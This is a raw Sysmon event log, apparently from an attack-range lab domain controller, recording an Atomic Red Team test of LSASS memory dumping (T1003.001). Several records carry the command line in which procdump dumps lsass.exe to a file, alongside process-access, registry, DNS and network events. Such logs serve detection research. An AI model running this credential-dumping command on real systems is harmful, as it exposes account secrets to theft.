154100x800000000000000025753Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:27.527{4DB9351A-A343-60D3-6106-00000000CF01}6596C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe10.0Sysinternals process dump utilityProcDumpSysinternals - www.sysinternals.comprocdumpC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -mm lsass.exe C:\Windows\Temp\lsass_dump.dmp C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F13DAB7D9CE88DDC0C80C2B9C5F422B5,SHA256=E2A7A9A803C6A4D2D503BB78A73CD9951E901BEB5FB450A2821EAF740FC48496,IMPHASH=E6F7F291413118F49398761021BAFCF2{4DB9351A-A343-60D3-6006-00000000CF01}6572C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -mm lsass.exe C:\Windows\Temp\lsass_dump.dmp 11241100x800000000000000025752Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 21:10:27.515{4DB9351A-A343-60D3-6006-00000000CF01}6572C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeC:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe2021-06-23 21:10:19.343 10341000x800000000000000025751Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.515{4DB9351A-A343-60D3-6006-00000000CF01}65726100C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe+7661|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 
13241300x800000000000000025750Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localAlert,Sysinternals Tool UsedSetValue2021-06-23 21:10:27.499{4DB9351A-A343-60D3-6006-00000000CF01}6572C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeHKU\S-1-5-21-229316442-2325824265-1712718341-500\SOFTWARE\Sysinternals\ProcDump\EulaAcceptedDWORD (0x00000001) 10341000x800000000000000025749Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.499{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A343-60D3-6006-00000000CF01}6572C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025748Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025747Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:27.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025746Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025745Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:27.484{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025744Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.484{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A343-60D3-6006-00000000CF01}6572C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025743Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.484{4DB9351A-A343-60D3-5F06-00000000CF01}53601684C:\Windows\system32\cmd.exe{4DB9351A-A343-60D3-6006-00000000CF01}6572C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
154100x800000000000000025742Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.494{4DB9351A-A343-60D3-6006-00000000CF01}6572C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe10.0Sysinternals process dump utilityProcDumpSysinternals - www.sysinternals.comprocdumpC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -mm lsass.exe C:\Windows\Temp\lsass_dump.dmp C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=D3763FFBFAF30BCFD866B8ED0324E7A3,SHA256=916CC8D6BF2282AE0D2DB587F4F96780AF59E685A1F1A511E0B2B276669DC802,IMPHASH=83B075100F8ECC5BF8446EDDD8E9CD6E{4DB9351A-A343-60D3-5F06-00000000CF01}5360C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -mm lsass.exe C:\Windows\Temp\lsass_dump.dmp" 10341000x800000000000000025741Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.484{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A343-60D3-5F06-00000000CF01}5360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025740Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:27.484{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A343-60D3-5F06-00000000CF01}5360C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025739Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.468{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025738Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:27.468{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025737Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.468{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025736Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:27.468{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025735Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.468{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A343-60D3-5F06-00000000CF01}5360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025734Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:27.468{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A343-60D3-5F06-00000000CF01}5360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|UNKNOWN(00007FFF5BA1CD48) 
154100x800000000000000025733Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.481{4DB9351A-A343-60D3-5F06-00000000CF01}5360C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -mm lsass.exe C:\Windows\Temp\lsass_dump.dmp" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025732Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.468{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025731Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.468{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025730Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.406{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-out.txtMD5=9C905CE296990F028EFC8CC9F908FE09,SHA256=73FBE97487641ACD5B284683F723E46E349FF5FC31234642CD4F1E71F80D466E,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000025729Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.312{4DB9351A-A341-60D3-5E06-00000000CF01}6316ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000025728Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.442{4DB9351A-9DEA-60D3-2E00-00000000CF01}8crl.certum.pl0type: 5 crl.akamai.certum.pl;type: 5 crl.certum.pl.edgekey.net;type: 5 e83157.dscb.akamaiedge.net;::ffff:23.38.191.10;::ffff:23.38.191.26;C:\Windows\sysmon64.exe 22542200x800000000000000025727Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.296{4DB9351A-9DEA-60D3-2E00-00000000CF01}8subca.ocsp-certum.com0type: 5 ocsp.akamai.certum.pl;type: 5 ocsp.certum.pl.edgekey.net;type: 5 e96763.dscb.akamaiedge.net;::ffff:104.98.114.184;::ffff:104.98.114.187;C:\Windows\sysmon64.exe 23542300x800000000000000025726Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.093{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=16C066928E479E3738382C319547B087,SHA256=F595CAE9E516517A82969364B825D018FFA25BEBE08354356D8E39D569244F43,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000025725Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.915{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61541-false104.98.114.187-80http 
354300x800000000000000025724Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.905{4DB9351A-9DDD-60D3-1400-00000000CF01}1056C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse127.0.0.1win-dc-663.attackrange.local65524-false127.0.0.1win-dc-663.attackrange.local53domain 354300x800000000000000025723Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.835{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-663.attackrange.local53domainfalse127.0.0.1win-dc-663.attackrange.local65524- 354300x800000000000000025722Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.835{4DB9351A-9DDD-60D3-1400-00000000CF01}1056C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:3600:7d00:9860:8494:380:ffff-65524-true7f00:1:4439:4b60:7404:488b:4368:4889-53domain 354300x800000000000000025721Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.440{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61540-false23.38.191.10-80http 354300x800000000000000025720Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.323{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53618- 354300x800000000000000025719Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.295{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61539-false104.98.114.184-80http 354300x800000000000000025718Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:25.182{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local58856- 23542300x800000000000000025773Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:28.968{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-err.txtMD5=DB931BA41E34446C293AAF0939AAA36B,SHA256=BD8A3EFD01ADDDBA44F13E6D1B876E7237D8CDAA52EBE24FA7A909A88D5E69CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025772Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:28.952{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-out.txtMD5=749012F3ACC66A717E2BBA374B9EDFFC,SHA256=379CA599EB092AA55C32739983901F79FB29BB665ABC153CDA57C518BD0B05EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025771Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:28.921{4DB9351A-A343-60D3-6006-00000000CF01}6572ATTACKRANGE\AdministratorC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeC:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exeMD5=F13DAB7D9CE88DDC0C80C2B9C5F422B5,SHA256=E2A7A9A803C6A4D2D503BB78A73CD9951E901BEB5FB450A2821EAF740FC48496,IMPHASH=E6F7F291413118F49398761021BAFCF2truetrue 23542300x800000000000000025770Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:28.499{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
